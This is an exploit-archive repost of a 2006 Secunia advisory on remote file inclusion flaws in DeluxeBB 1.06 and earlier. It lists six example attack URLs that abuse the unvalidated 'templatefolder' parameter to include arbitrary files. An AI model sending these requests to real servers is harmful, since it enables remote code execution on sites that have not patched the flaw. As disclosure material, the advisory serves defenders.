DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities
# Published : 2006-06-15
# Author : Andreas Sandblad
# Previous Title : CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability
# Next Title : The Bible Portal Project <= 2.12 (destination) File Include Vulnerability

Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified, before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]

# www.Syue.com [2006-06-15]